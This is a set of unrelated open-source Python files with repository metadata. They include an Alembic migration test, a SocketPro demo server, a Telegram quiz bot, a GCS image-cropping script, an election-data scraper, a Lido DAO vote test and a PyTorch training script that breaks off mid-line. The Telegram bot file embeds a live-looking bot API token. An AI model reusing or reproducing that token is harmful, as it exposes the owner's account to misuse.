10741283794 | from __future__ import unicode_literals
import os
import unittest
import tempfile
import textwrap
import decimal
import shutil
import transaction as db_transaction
class TestAlembic(unittest.TestCase):
def setUp(self):
from sqlalchemy import create_engine
from sqlalchemy.orm import scoped_session
from sqlalchemy.orm import sessionmaker
from sqlalchemy.ext.declarative import declarative_base
from zope.sqlalchemy import ZopeTransactionExtension
from alembic.config import Config
self.temp_dir = tempfile.mkdtemp()
# init database
default_sqlite_url = 'sqlite:///{}/billy.sqlite'.format(self.temp_dir)
self.db_url = os.environ.get(
'BILLY_FUNC_TEST_DB',
default_sqlite_url,
)
# as these tests cannot work with in-memory sqlite, so, when it is
# a sqlite URL, we use the one in temp folder anyway
if self.db_url.startswith('sqlite:'):
self.db_url = default_sqlite_url
self.engine = create_engine(self.db_url, convert_unicode=True)
self.declarative_base = declarative_base()
self.declarative_base.metadata.bind = self.engine
self.session = scoped_session(sessionmaker(
autocommit=False,
autoflush=False,
bind=self.engine,
extension=ZopeTransactionExtension()
))
self.alembic_path = os.path.join(self.temp_dir, 'alembic.ini')
with open(self.alembic_path, 'wt') as f:
f.write(textwrap.dedent("""\
[alembic]
script_location = alembic
sqlalchemy.url = {}
[loggers]
keys = root
[handlers]
keys =
[formatters]
keys =
[logger_root]
level = WARN
qualname =
handlers =
""").format(self.db_url))
self.alembic_cfg = Config(self.alembic_path)
def tearDown(self):
# drop all tables
self.session.remove()
self.declarative_base.metadata.drop_all()
shutil.rmtree(self.temp_dir)
def test_use_integer_column_for_amount(self):
from sqlalchemy import Column
from sqlalchemy import Integer
from sqlalchemy import Numeric
class Plan(self.declarative_base):
__tablename__ = 'plan'
guid = Column(Integer, primary_key=True)
amount = Column(Numeric(10, 2))
class Subscription(self.declarative_base):
__tablename__ = 'subscription'
guid = Column(Integer, primary_key=True)
amount = Column(Numeric(10, 2))
class Transaction(self.declarative_base):
__tablename__ = 'transaction'
guid = Column(Integer, primary_key=True)
amount = Column(Numeric(10, 2))
self.declarative_base.metadata.create_all()
with db_transaction.manager:
for amount in ['12.34', '55.66', '10']:
amount = decimal.Decimal(amount)
plan = Plan(amount=amount)
subscription = Subscription(amount=amount)
transaction = Transaction(amount=amount)
self.session.add(plan)
self.session.add(subscription)
self.session.add(transaction)
from alembic import command
command.stamp(self.alembic_cfg, 'base')
command.upgrade(self.alembic_cfg, 'b3d4192b123')
# Notice: this with statement here makes sure the database transaction
# will be closed after querying, otherwise, we have two connections
# to postgresql (one by testing code, one by Alembic), when we are
# doing following downgrade, there is table alter, it appears
# there will be a deadlock when there is a overlap of two transaction
# scope
with db_transaction.manager:
for table in [Plan, Subscription, Transaction]:
amounts = self.session.query(table.amount).all()
amounts = map(lambda item: float(item[0]), amounts)
# make sure all float dollars are converted into integer cents
self.assertEqual(set(amounts), set([1234, 5566, 1000]))
command.downgrade(self.alembic_cfg, 'base')
with db_transaction.manager:
for table in [Plan, Subscription, Transaction]:
amounts = self.session.query(table.amount).all()
amounts = map(lambda item: item[0], amounts)
self.assertEqual(
set(amounts),
set(map(decimal.Decimal, ['12.34', '55.66', '10']))
)
| vdt/billy | billy/tests/functional/test_alembic.py | test_alembic.py | py | 4,718 | python | en | code | null | github-code | 36 | [
{
"api_name": "unittest.TestCase",
"line_number": 12,
"usage_type": "attribute"
},
{
"api_name": "tempfile.mkdtemp",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "os.environ.get",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "os.environ",
... |
23080854641 | from consts import piConst, hwConst
from spa.serverside import CSocketProServer, CSocketProService,\
CClientPeer, BaseServiceID, Plugin
from spa.clientside import CAsyncQueue, CStreamingFile, CMysql, COdbc, CSqlite, CSqlServer, CPostgres
from spa.udb import DB_CONSTS
from pub_sub.ps_server.hwpeer import CHelloWorldPeer
from webdemo.myhttppeer import CMyHttpPeer
import sys
from ctypes import *
from sys import platform as os
# bool U_MODULE_OPENED WINAPI SetSPluginGlobalOptions(const char *jsonUtf8Options);
sqlite_lib = None
if os == "win32":
sqlite_lib = WinDLL("ssqlite.dll")
else:
sqlite_lib = WinDLL("libssqlite.so")
SetSPluginGlobalOptions = sqlite_lib.SetSPluginGlobalOptions
SetSPluginGlobalOptions.argtypes = [c_char_p]
SetSPluginGlobalOptions.restype = c_bool
# int U_MODULE_OPENED WINAPI DoSPluginAuthentication(SPA::UINT64 hSocket,
# const wchar_t *userId, const wchar_t *password, unsigned int nSvsId,
# const wchar_t *options);
SQLite_Auth = sqlite_lib.DoSPluginAuthentication
SQLite_Auth.argtypes = [c_uint64, c_wchar_p, c_wchar_p, c_uint, c_wchar_p]
SQLite_Auth.restype = c_int
mysql_lib = None
MySQL_Auth = None
if os == "win32":
mysql_lib = WinDLL("smysql.dll")
else:
mysql_lib = WinDLL("libsmysql.so")
if mysql_lib:
MySQL_Auth = mysql_lib.DoSPluginAuthentication
MySQL_Auth.argtypes = [c_uint64, c_wchar_p, c_wchar_p, c_uint, c_wchar_p]
MySQL_Auth.restype = c_int
odbc_lib = None
ODBC_Auth = None
if os == "win32":
odbc_lib = WinDLL("sodbc.dll")
else:
odbc_lib = WinDLL("libsodbc.so")
if odbc_lib:
ODBC_Auth = odbc_lib.DoSPluginAuthentication
ODBC_Auth.argtypes = [c_uint64, c_wchar_p, c_wchar_p, c_uint, c_wchar_p]
ODBC_Auth.restype = c_int
mssql_lib = None
if os == "win32":
mssql_lib = WinDLL("usqlsvr.dll")
else:
mssql_lib = WinDLL("libusqlsvr.so")
MsSql_Auth = mssql_lib.DoSPluginAuthentication
MsSql_Auth.argtypes = [c_uint64, c_wchar_p, c_wchar_p, c_uint, c_wchar_p]
MsSql_Auth.restype = c_int
postgres_lib = None
Postgres_Auth = None
if os == "win32":
postgres_lib = WinDLL("spostgres.dll")
else:
postgres_lib = WinDLL("libspostgres.so")
if postgres_lib:
Postgres_Auth = postgres_lib.DoSPluginAuthentication
Postgres_Auth.argtypes = [c_uint64, c_wchar_p, c_wchar_p, c_uint, c_wchar_p]
Postgres_Auth.restype = c_int
with CSocketProServer() as server:
def OnClose(hSocket, errCode):
bs = CSocketProService.SeekService(hSocket)
if bs:
sp = bs.Seek(hSocket)
# ......
server.OnClose = OnClose
def OnIsPermitted(hSocket, userId, pwd, svsId):
auth_res = Plugin.AUTHENTICATION_NOT_IMPLEMENTED
if svsId == hwConst.sidHelloWorld or svsId == BaseServiceID.sidHTTP or svsId == piConst.sidPi or svsId == piConst.sidPiWorker:
# give permission to known services without authentication
auth_res = Plugin.AUTHENTICATION_OK
elif svsId == CAsyncQueue.sidQueue or svsId == CStreamingFile.sidFile:
# give permission to known services without authentication
auth_res = Plugin.AUTHENTICATION_OK
elif svsId == CPostgres.sidPostgres:
auth_res = Postgres_Auth(hSocket, userId, pwd, svsId, 'server=localhost;timeout=45;max_SQLs_batched=16')
elif svsId == CSqlServer.sidMsSql:
auth_res = MsSql_Auth(hSocket, userId, pwd, svsId, 'server=localhost;timeout=45;max_SQLs_batched=16')
elif svsId == COdbc.sidOdbc:
auth_res = ODBC_Auth(hSocket, userId, pwd, svsId, 'DRIVER={ODBC Driver 13 for SQL Server};Server=windesk;database=sakila;max_sqls_batched=16')
elif svsId == CMysql.sidMysql:
auth_res = MySQL_Auth(hSocket, userId, pwd, svsId, 'server=windesk;max_sqls_batched=16')
elif svsId == CSqlite.sidSqlite:
auth_res = SQLite_Auth(hSocket, userId, pwd, svsId, 'usqlite.db')
if auth_res == Plugin.AUTHENTICATION_PROCESSED:
# give permission without authentication
auth_res = Plugin.AUTHENTICATION_OK
if auth_res >= Plugin.AUTHENTICATION_OK:
print(userId + "'s connecting permitted, and DB handle opened and cached")
elif auth_res == Plugin.AUTHENTICATION_PROCESSED:
print(userId + "'s connecting denied: no authentication implemented but DB handle opened and cached")
elif auth_res == Plugin.AUTHENTICATION_FAILED:
print(userId + "'s connecting denied: bad password or user id")
elif auth_res == Plugin.AUTHENTICATION_INTERNAL_ERROR:
print(userId + "'s connecting denied: plugin internal error")
elif auth_res == Plugin.AUTHENTICATION_NOT_IMPLEMENTED:
print(userId + "'s connecting denied: no authentication implemented")
else:
print(userId + "'s connecting denied: unknown reseaon with res --" + str(auth_res))
return auth_res >= Plugin.AUTHENTICATION_OK
server.OnIsPermitted = OnIsPermitted
def do_configuration():
CSocketProServer.PushManager.AddAChatGroup(1, "R&D Department")
CSocketProServer.PushManager.AddAChatGroup(2, "Sales Department")
CSocketProServer.PushManager.AddAChatGroup(3, "Management Department")
CSocketProServer.PushManager.AddAChatGroup(7, "HR Department")
CSocketProServer.PushManager.AddAChatGroup(DB_CONSTS.CACHE_UPDATE_CHAT_GROUP_ID, "Subscribe/publish for front clients")
return True # True -- ok; False -- no listening server
server.OnSettingServer = do_configuration
mapIdMethod = {
hwConst.idSayHello: 'sayHello',
hwConst.idSleep: ['sleep', True], # or ('sleep', True)
hwConst.idEcho: 'echo'
}
server.hw = CSocketProService(CHelloWorldPeer, hwConst.sidHelloWorld, mapIdMethod)
# HTTP/WebSocket service
server.HttpSvs = CSocketProService(CMyHttpPeer, BaseServiceID.sidHTTP, None)
mapIdReq = {}
server.Pi = CSocketProService(CClientPeer, piConst.sidPi, mapIdReq)
server.PiWorker = CSocketProService(CClientPeer, piConst.sidPiWorker, mapIdReq)
if not CSocketProServer.Router.SetRouting(piConst.sidPi, piConst.sidPiWorker):
print('Setting routing failed')
# load file streaming library at the directory ../bin/free_services/file
# 16 * 1024 dequeue batch size in bytes
server.aq = CSocketProServer.DllManager.AddALibrary('uasyncqueue', 16 * 1024)
# load async sqlite library located at the directory ../bin/free_services/sqlite
server.sqlite = CSocketProServer.DllManager.AddALibrary("ssqlite")
if server.sqlite:
# monitoring sakila.db table events (DELETE, INSERT and UPDATE) for
# tables actor, language, category, country and film_actor
jsonOptions = '{"global_connection_string":"usqlite.db","monitored_tables":\
"sakila.db.actor;sakila.db.language;sakila.db.category;sakila.db.country;sakila.db.film_actor"}'
SetSPluginGlobalOptions(jsonOptions.encode('utf-8'))
# load persistent message queue library at the directory ../bin/free_services/queue
server.file = CSocketProServer.DllManager.AddALibrary('ustreamfile')
# load MySQL/MariaDB server plugin library at the directory ../bin/free_services/mm_middle
server.mysql = CSocketProServer.DllManager.AddALibrary("smysql")
# load ODBC server plugin library at the directory ../bin/win or ../bin/linux
server.odbc = CSocketProServer.DllManager.AddALibrary("sodbc")
# load MS sql server plugin library at the directory ../bin/win or ../bin/linux
server.mssql = CSocketProServer.DllManager.AddALibrary("usqlsvr")
# load PostgreSQL plugin library at the directory ../bin/win/win64 or ../bin/linux
server.postgres = CSocketProServer.DllManager.AddALibrary("spostgres")
if not server.Run(20901):
print('Error message = ' + CSocketProServer.ErrorMessage)
print('Read a line to shutdown the application ......')
line = sys.stdin.readline()
| udaparts/socketpro | tutorials/python/all_servers/all_servers.py | all_servers.py | py | 7,957 | python | en | code | 27 | github-code | 36 | [
{
"api_name": "sys.platform",
"line_number": 14,
"usage_type": "name"
},
{
"api_name": "sys.platform",
"line_number": 32,
"usage_type": "name"
},
{
"api_name": "sys.platform",
"line_number": 43,
"usage_type": "name"
},
{
"api_name": "sys.platform",
"line_numbe... |
34980505423 | #存在重复
# 给定一个整数数组,判断是否存在重复元素。
# 如果任何值在数组中出现至少两次,函数返回 true。如果数组中每个元素都不相同,则返回 false。
#===============================================================================
# 输入: [1,2,3,1]
# 输出: true
#===============================================================================
from collections import Counter
class Solution:
def containsDuplicate(self, nums):
"""
:type nums: List[int]
:rtype: bool
"""
c=Counter(nums)
for i in c:
if c[i]>1:
return True
return False
result=Solution().containsDuplicate([1,1,1,3,3,4,3,2,4,2])
print(result) | huowolf/leetcode | src/array/containsDuplicate.py | containsDuplicate.py | py | 775 | python | fr | code | 0 | github-code | 36 | [
{
"api_name": "collections.Counter",
"line_number": 15,
"usage_type": "call"
}
] |
9744073954 | import sys
import os
import logging
import urllib
from datetime import datetime, timedelta
from google.appengine.ext import ndb
from google.appengine.api import users
from google.appengine.ext import blobstore
sys.path.append(os.path.join(os.path.dirname(__file__), '..'))
from common.arguments import *
from common.errors import *
from users.users import build_user_key
sys.path.append(os.path.join(os.path.dirname(__file__), '../..'))
import lib.parsedatetime
log = logging.getLogger("assets")
def key(asset_id):
return ndb.Key(Asset, int(asset_id))
def create(actor, asset_id=None, asset_key=None, **kwargs):
asset = Asset(key=asset_key or key(asset_id))
asset.created_by = build_user_key(actor)
asset.condition = "new"
return update(actor, asset=asset, **kwargs)
def update(actor, asset_id=None, asset_key=None, asset=None, name=undefined,
description=undefined, serial=undefined, condition=undefined,
cost=undefined, value=undefined, url=undefined, **ignored):
asset = asset or (asset_key or key(asset_id)).get()
# Update fields
if is_defined(name): asset.name = name
if is_defined(url): asset.url = url
if is_defined(description): asset.description = description
if is_defined(serial): asset.serial = serial
if is_defined(condition): asset.condition = condition
if is_defined(cost) and cost: asset.cost = float(cost)
if is_defined(value) and value: asset.value = float(value)
# Fix missing fields
if not asset.name: asset.name = str(asset.key.id())
asset.put()
return asset
def delete(actor, asset_id=None, asset_key=None, asset=None):
asset = asset or get(actor, asset_id, asset_key)
asset.delete()
def get(actor, asset_id=None, asset_key=None, silent=False):
result = (asset_key or key(asset_id)).get()
if result:
return result
elif silent:
return None
else:
raise NotFoundError()
def list(actor):
return Asset.query()
def search(**ignored):
pass
def check_out(actor, asset=None, asset_key=None, asset_id=None, checked_out_to=undefined,
project=undefined, expected=undefined, timezoneoffset=None, **ignored):
asset = asset or get(actor, asset_key=asset_key, asset_id=asset_id)
if asset.checkout:
raise IllegalError("Asset is already checked out")
checkout = AssetCheckout(parent=asset.key)
checkout.checked_out_by = build_user_key(actor)
checkout.checked_out_to = build_user_key(actor)
checkout.condition_out = asset.condition
if is_defined(expected):
if expected == "":
expected = None
else:
if timezoneoffset:
offset = timedelta(minutes=int(timezoneoffset))
client_time = datetime.utcnow() - offset
parsed_time = lib.parsedatetime.Calendar().parse(expected, client_time)
else:
offset = datetime.timedelta(0)
parsed_time = lib.parsedatetime.Calendar().parse(expected)
if parsed_time[1] == 1:
checkout.expected = datetime(*parsed_time[0][:3]) + offset
else:
checkout.expected = datetime(*parsed_time[0][:6]) + offset
if is_defined(checked_out_to) and checked_out_to: checkout.checked_out_to = build_user_key(checked_out_to)
if is_defined(project) and project: checkout.project = project
checkout.put()
asset.checkout = checkout.key
asset.put()
return checkout
def check_in(actor, asset=None, asset_key=None, asset_id=None, condition=undefined, **ignored):
asset = asset or get(actor, asset_key=asset_key, asset_id=asset_id)
if not asset.checkout:
raise IllegalError("Asset is not checked out")
checkout = asset.checkout.get()
checkout.checked_in_by = build_user_key(actor)
checkout.checked_in = datetime.now()
checkout.condition_in = asset.condition
if is_defined(condition): checkout.condition_in = condition
checkout.put()
asset.checkout = None
asset.condition = checkout.condition_in
asset.put()
return checkout
valid_conditions = ["new", "excellent", "good", "poor", "unusable", "gone"]
class Asset(ndb.Model):
name = ndb.StringProperty(required=True)
url = ndb.StringProperty()
description = ndb.StringProperty()
serial = ndb.StringProperty()
condition = ndb.StringProperty(required=True, default="new", choices=valid_conditions)
cost = ndb.FloatProperty()
value = ndb.FloatProperty()
checkout = ndb.KeyProperty(kind='AssetCheckout')
created_by = ndb.KeyProperty(kind='User')
created = ndb.DateTimeProperty(auto_now_add=True)
class AssetCheckout(ndb.Model):
# Check out fields
checked_out_to = ndb.KeyProperty(kind='User', required=True)
project = ndb.KeyProperty(kind='Project')
checked_out = ndb.DateTimeProperty(auto_now_add=True)
checked_out_by = ndb.KeyProperty(kind='User', required=True)
condition_out = ndb.StringProperty(required=True, choices=valid_conditions)
expected = ndb.DateTimeProperty()
# Check in fields
checked_in = ndb.DateTimeProperty()
checked_in_by = ndb.KeyProperty(kind='User')
condition_in = ndb.StringProperty(choices=valid_conditions)
| AegisTools/aegis-appengine | modules/assets/assets_private.py | assets_private.py | py | 5,339 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "sys.path.append",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "sys.path",
"line_number": 12,
"usage_type": "attribute"
},
{
"api_name": "os.path.join",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number... |
35622258622 | import boto3
import base64
import os
ENDPOINT_NAME = os.environ['ENDPOINT_NAME']
def lambda_handler(event, context):
""" Handler of the lambda function """
# The SageMaker runtime is what allows us to invoke the endpoint that we've created.
runtime = boto3.Session().client('sagemaker-runtime')
# Now we use the SageMaker runtime to invoke our endpoint, sending the img we were given
response = runtime.invoke_endpoint(EndpointName = ENDPOINT_NAME, # The name of the endpoint we created
ContentType = 'application/json', # The data format that is expected
Body = event['body']) # The img in base64
# The response is an HTTP response whose body contains the result of our inference
result = response['Body'].read().decode('utf-8')
return {
'statusCode' : 200,
'headers' : { 'Content-Type' : 'text/plain',
'Access-Control-Allow-Origin' : '*',
'Access-Control-Allow-Headers': 'Content-Type',
'Access-Control-Allow-Methods': 'OPTIONS,GET,POST' },
'body' : result
} | jorgeramirezcarrasco/udacity-capstone-project-dog-breed-classifier | lambda/lambda_function.py | lambda_function.py | py | 1,216 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "os.environ",
"line_number": 4,
"usage_type": "attribute"
},
{
"api_name": "boto3.Session",
"line_number": 10,
"usage_type": "call"
}
] |
29540265563 | import telebot
from telebot import types
bot = telebot.TeleBot('1507860102:AAH3y4nFwQgnYJCFP49PMRRqQVEvhIGrLmw')
user_dict = {}
class User:
def __init__(self, name):
self.name = name
self.age = None
self.sex = None
# Handle '/start' and '/help'
@bot.message_handler(commands=['help', 'start'])
def send_welcome(message):
markup = types.ReplyKeyboardMarkup(one_time_keyboard=True)
markup.add('Tak', 'Nie')
msg = bot.reply_to(message,
"""\
Cześć witam w quize.
Kontynujemy?
""",
reply_markup=markup)
bot.register_next_step_handler(msg, start_quiz_step)
def start_quiz_step(message):
try:
chat_id = message.chat.id
answer = message.text
if answer == "Tak":
msg = bot.reply_to(message, 'Jak masz na imię?')
bot.register_next_step_handler(msg, process_name_step)
elif answer == "Nie":
bot.send_message(chat_id, 'Miło było cię poznać')
else:
raise Exception("Unknown answer")
except Exception as e:
bot.reply_to(message, 'oooops')
def process_name_step(message):
try:
chat_id = message.chat.id
name = message.text
user = User(name)
user_dict[chat_id] = user
msg = bot.reply_to(message, 'Ile masz lat?')
bot.register_next_step_handler(msg, process_age_step)
except Exception as e:
bot.reply_to(message, 'oooops')
def process_age_step(message):
try:
chat_id = message.chat.id
age = message.text
if not age.isdigit():
msg = bot.reply_to(message, 'Age should be a number. How old are you?')
bot.register_next_step_handler(msg, process_name_step)
return
user = user_dict[chat_id]
user.age = age
markup = types.ReplyKeyboardMarkup(one_time_keyboard=True)
markup.add('Male', 'Female')
msg = bot.reply_to(message, 'What is your gender', reply_markup=markup)
bot.register_next_step_handler(msg, process_sex_step)
except Exception as e:
bot.reply_to(message, 'oooops')
def process_sex_step(message):
try:
chat_id = message.chat.id
sex = message.text
user = user_dict[chat_id]
if (sex == 'Male') or (sex == 'Female'):
user.sex = sex
else:
raise Exception("Unknown sex")
bot.send_message(chat_id, 'Nice to meet you ' + user.name + '\n Age:' + str(user.age) + '\n Sex:' + user.sex)
except Exception as e:
bot.reply_to(message, 'oooops')
# Enable saving next step handlers to file "./.handlers-saves/step.save".
# Delay=2 means that after any change in next step handlers (e.g. calling register_next_step_handler())
# saving will hapen after delay 2 seconds.
bot.enable_save_next_step_handlers(delay=2)
bot.polling(none_stop=True) | HKarpenko/teleBot | main.py | main.py | py | 2,905 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "telebot.TeleBot",
"line_number": 4,
"usage_type": "call"
},
{
"api_name": "telebot.types.ReplyKeyboardMarkup",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "telebot.types",
"line_number": 18,
"usage_type": "name"
},
{
"api_name": "telebo... |
32542353820 | from google.cloud import storage
from configparser import ConfigParser
from google.oauth2 import service_account
from googleapiclient.discovery import build
from utils.demo_io import (
get_initial_slide_df_with_predictions_only,
get_fovs_df,
get_top_level_dirs,
populate_slide_rows,
get_histogram_df,
list_blobs_with_prefix,
get_combined_spots_df,
crop_spots_from_slide,
)
import polars as pl
from gcsfs import GCSFileSystem
cutoff = 10 # how many slides to view cropped spot images from
# Parse in key and bucket name from config file
cfp = ConfigParser()
cfp.read("config.ini")
service_account_key_json = cfp["GCS"]["gcs_storage_key"]
gs_url = cfp["GCS"]["bucket_url"]
bucket_name = gs_url.replace("gs://", "")
# Define GCS file system so files can be read
gcs = GCSFileSystem(token=service_account_key_json)
# Authenticate using the service account key file
credentials = service_account.Credentials.from_service_account_file(
service_account_key_json, scopes=["https://www.googleapis.com/auth/cloud-platform"]
)
client = storage.Client.from_service_account_json(service_account_key_json)
# Create a storage client
storage_service = build("storage", "v1", credentials=credentials)
slide_files_raw = list_blobs_with_prefix(
client, bucket_name, prefix="patient_slides_analysis", cutoff=cutoff * 2
)["blobs"]
slides_of_interest = [
slidefile.split("/")[-1].strip(".npy")
for slidefile in slide_files_raw
if slidefile.endswith(".npy")
]
for sl in slides_of_interest:
spot_df = get_combined_spots_df(bucket_name, gcs, sl)
print(spot_df)
spot_df_top = spot_df.sort(pl.col("parasite output"), descending=True).head(20)
spot_df_top = spot_df_top.with_columns(spot_df_top["r"].cast(pl.Int64) * 2)
spot_coords = []
for spot in spot_df_top.rows(named=True):
spot_coords.append(
(
spot["FOV_row"],
spot["FOV_col"],
spot["FOV_z"],
spot["x"],
spot["y"],
spot["r"],
)
)
print(spot_df_top)
spot_imgs = crop_spots_from_slide(storage_service, bucket_name, sl, spot_coords)
for img in spot_imgs:
img.show()
| alice-gottlieb/nautilus-dashboard | examples/spot_cropping_example.py | spot_cropping_example.py | py | 2,247 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "configparser.ConfigParser",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "gcsfs.GCSFileSystem",
"line_number": 31,
"usage_type": "call"
},
{
"api_name": "google.oauth2.service_account.Credentials.from_service_account_file",
"line_number": 34,
"u... |
20471993107 | from pprint import pprint
from bs4 import BeautifulSoup
import requests
import pandas as pd
import pprint
election = []
user_agent = "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.37"
URL = "https://en.wikipedia.org/wiki/List_of_United_States_presidential_elections_by_popular_vote_margin"
response = requests.get(URL, headers={'User-Agent': user_agent})
html = response.content
soup = BeautifulSoup(html, "lxml")
for tr in soup.find_all('tr'):
data = []
for td in tr:
clean_text = td.get_text().strip('\n')
if len(clean_text) < 1:
continue
if clean_text == ',No candidate[a]':
clean_text = 'No Candidate, ' + ', '
data.append(clean_text)
if (data == []) or (len(data) < 10):
continue
election.append(data)
# pprint.pprint(election)
df = pd.DataFrame(election, columns = [
'election_number', 'year', 'winner',
'party', 'number_electoral_votes', 'electoral_perc',
'pop_vote_perc', 'pop_margin_perc', 'number_pop_votes',
'number_pop_margin', 'runner_up_name', 'runner_up_party', 'turnout_perc'])
df.to_csv(f'../datasets/elections.csv', sep=',', encoding='utf-8-sig', index = False) | Eleanor-Shellstrop/presidents | python/elections.py | elections.py | py | 1,183 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "requests.get",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "bs4.BeautifulSoup",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "pandas.DataFrame",
"line_number": 30,
"usage_type": "call"
}
] |
5547367389 | """
Tests for Voting 21/06/2022 [Lido app for Goerli].
"""
import pytest
from brownie import interface
from scripts.vote_2022_06_21_goerli_lido_app import (
start_vote,
get_lido_app_address,
get_lido_app_old_version,
)
from utils.test.tx_tracing_helpers import *
from utils.config import network_name
from utils.config import lido_dao_lido_repo
def get_lido_app_old_content_uri():
if network_name() in ("goerli", "goerli-fork"):
return (
"0x697066733a516d526a43546452626a6b4755613774364832506e7377475a7965636e4e5367386f736b346b593269383278556e"
)
elif network_name() in ("mainnet", "mainnet-fork"):
return (
"0x697066733a516d516b4a4d7476753474794a76577250584a666a4c667954576e393539696179794e6a703759714e7a58377053"
)
else:
assert False, f'Unsupported network "{network_name()}"'
def get_lido_app_old_ipfs_cid():
if network_name() in ("goerli", "goerli-fork"):
return "QmRjCTdRbjkGUa7t6H2PnswGZyecnNSg8osk4kY2i82xUn"
elif network_name() in ("mainnet", "mainnet-fork"):
return "QmQkJMtvu4tyJvWrPXJfjLfyTWn959iayyNjp7YqNzX7pS"
else:
assert False, f'Unsupported network "{network_name()}"'
lido_old_app = {
"address": get_lido_app_address(),
"ipfsCid": get_lido_app_old_ipfs_cid(),
"content_uri": get_lido_app_old_content_uri(),
"version": get_lido_app_old_version(),
}
lido_new_app = {
"address": get_lido_app_address(),
"ipfsCid": "QmScYxzmmrAV1cDBjL3i7jzaZuiJ76UqdaFZiMgsxoFGzC",
"content_uri": "0x697066733a516d536359787a6d6d724156316344426a4c3369376a7a615a75694a373655716461465a694d6773786f46477a43",
"version": (8, 0, 4),
}
def test_vote(helpers, accounts, ldo_holder, dao_voting, vote_id_from_env, bypass_events_decoding, dao_agent, lido):
# Validate old Lido app
lido_repo = interface.Repo(lido_dao_lido_repo)
lido_old_app_from_chain = lido_repo.getLatest()
print(lido_old_app_from_chain)
# check old versions of lido app is correct
assert lido_old_app["address"] == lido_old_app_from_chain[1]
assert lido_old_app["version"] == lido_old_app_from_chain[0]
assert lido_old_app["content_uri"] == lido_old_app_from_chain[2]
# check old ipfs link
bytes_object = lido_old_app_from_chain[2][:]
lido_old_ipfs = bytes_object.decode("ASCII")
lido_old_app_ipfs = f"ipfs:{lido_old_app['ipfsCid']}"
assert lido_old_app_ipfs == lido_old_ipfs
# START VOTE
vote_id = vote_id_from_env or start_vote({"from": ldo_holder}, silent=True)[0]
tx: TransactionReceipt = helpers.execute_vote(
vote_id=vote_id, accounts=accounts, dao_voting=dao_voting, skip_time=3 * 60 * 60 * 24
)
# validate vote events
assert count_vote_items_by_events(tx, dao_voting) == 1, "Incorrect voting items count"
# Validate vote items 4: new lido app
## check only version and ipfs was changed
lido_new_app_from_chain = lido_repo.getLatest()
assert lido_new_app["address"] == lido_new_app_from_chain[1]
assert lido_new_app["version"] == lido_new_app_from_chain[0]
assert lido_new_app["content_uri"] == lido_new_app_from_chain[2]
## check new ipfs link
bytes_object = lido_new_app_from_chain[2][:]
lido_old_ipfs = bytes_object.decode("ASCII")
lido_new_app_ipfs = f"ipfs:{lido_new_app['ipfsCid']}"
assert lido_new_app_ipfs == lido_old_ipfs
display_voting_events(tx)
if bypass_events_decoding or network_name() in ("goerli", "goerli-fork"):
return
| lidofinance/scripts | archive/tests/test_2022_06_21_2_goerli_lido_app.py | test_2022_06_21_2_goerli_lido_app.py | py | 3,523 | python | en | code | 14 | github-code | 36 | [
{
"api_name": "utils.config.network_name",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "utils.config.network_name",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "utils.config.network_name",
"line_number": 28,
"usage_type": "call"
},
{
"api... |
31353500311 | #!/usr/bin/env python3
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
import os
import sys
import torch
import torch.nn as nn
import torch.nn.parallel
import torch.backends.cudnn as cudnn
import torch.optim
from colorama import Fore
import config
from dataloader import getDataloaders
from utils import getModel, save_checkpoint, get_optimizer, optimizer_device, create_save_folder, filter_fixed_params
from args import arg_parser, arch_resume_names
from train_val import Trainer
from tensorboardX import SummaryWriter
dev = torch.device('cuda') if torch.cuda.is_available() else torch.device('cpu')
def main():
# parse arg and start experiment
global args
best_err1 = 100.
best_epoch = 0
now_epoch = 0
args = arg_parser.parse_args()
args.config_of_data = config.datasets[args.data]
args.num_classes = config.datasets[args.data]['num_classes']
# optionally resume from a checkpoint
if args.resume:
if args.resume and os.path.isfile(args.resume):
print("=> loading checkpoint '{}'".format(args.resume))
checkpoint = torch.load(args.resume)
old_args = checkpoint['args']
print('Old args:')
print(old_args)
# set args based on checkpoint
if args.start_epoch <= 1:
args.start_epoch = checkpoint['epoch'] + 1
now_epoch = args.start_epoch - 1
best_epoch = checkpoint['best_epoch']
best_err1 = checkpoint['best_err1']
print('pre best err1:{} @epoch{}'.format(best_err1, best_epoch))
# for name in arch_resume_names:
# if name in vars(args) and name in vars(old_args):
# setattr(args, name, getattr(old_args, name))
model = getModel(**vars(args))
model.load_state_dict(checkpoint['model_state_dict'])
model = nn.DataParallel(model) if torch.cuda.device_count() > 1 else model
model = model.to(dev)
training_params = filter_fixed_params(model, args.fixed_module_flags)
optimizer = get_optimizer(training_params, args)
if args.load_optimizer:
optimizer.load_state_dict(checkpoint['optimizer_state_dict'])
optimizer_device(optimizer, dev)
print('optimizer.state_dict():')
print(optimizer.state_dict()["param_groups"])
print("=> loaded checkpoint '{}' (epoch {})"
.format(args.resume, checkpoint['epoch']))
else:
print(
"=> no checkpoint found at '{}'".format(
Fore.RED +
args.resume +
Fore.RESET),
file=sys.stderr)
return
else:
# create model
print("=> creating model '{}'".format(args.arch))
model = getModel(**vars(args))
model = nn.DataParallel(model) if torch.cuda.device_count() > 1 else model
model = model.to(dev)
training_params = filter_fixed_params(model, args.fixed_module_flags)
optimizer = get_optimizer(training_params, args)
cudnn.benchmark = True
# check if the folder exists
create_save_folder(args.save, args.force)
# define loss function (criterion) and pptimizer
criterion = nn.CrossEntropyLoss().to(dev)
# set random seed
torch.manual_seed(args.seed)
trainer = Trainer(model, criterion, optimizer, args)
# create dataloader
if args.evaluate == 'train':
train_loader, _, _ = getDataloaders(
splits=('train'), **vars(args))
trainer.test(train_loader, now_epoch)
return
elif args.evaluate == 'val':
_, val_loader, _ = getDataloaders(
